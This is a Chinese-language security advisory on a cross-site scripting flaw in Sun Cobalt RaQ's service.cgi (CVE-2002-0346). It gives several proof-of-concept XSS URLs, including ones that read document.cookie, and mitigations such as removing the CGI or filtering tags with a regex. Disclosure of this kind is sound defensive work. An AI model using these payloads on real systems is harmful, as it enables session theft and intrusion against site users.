安全研究

安全漏洞
Sun Cobalt RaQ Service.CGI跨站执行脚本漏洞

发布日期:2002-02-28
更新日期:2002-03-05

受影响系统:
Sun Cobalt RaQ 4.0
Sun Cobalt RaQ 3.0
Sun Cobalt RaQ 2.0
描述:
BUGTRAQ  ID: 4211
CVE(CAN) ID: CVE-2002-0346

Sun Cobalt RaQ是ISPs使用的一种服务方软件。

由于未对用户输入做充分的过滤,该软件存在跨站执行脚本漏洞。

比如

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1>
<script>alert('hello')</script>

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('
Microsoft%20hole')</script>

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=java
script:alert(document.domain)>

http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(d
ocument.cookie)</script>

LOCATION:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Eale
rt(document.location)%3C/script%3E

COOKIES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Eale
rt(document.cookie)%3C/script%3E

TAG IMAGES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=java
script:alert(document.domain)>

WRITE ON DOCUMENT:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>documen
t.write(document.domain)</SCRIPT>

<*来源:Alex Hernandez (al3xhernandez@ureach.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-02/0351.html
        http://archives.neohapsis.com/archives/bugtraq/2002-02/0371.html
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 可以删除service.cgi、alert.cgi,或者禁止其执行。

* Peter N. Go (peter@arachinc.com)建议修改service.cgi,过滤来自用户输入的HTML
tags,在

my $service = $q->param('service');

之后增加如下代码

$service =~ s/<([^>])*>//g;

厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.sun.com

浏览次数:3371
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障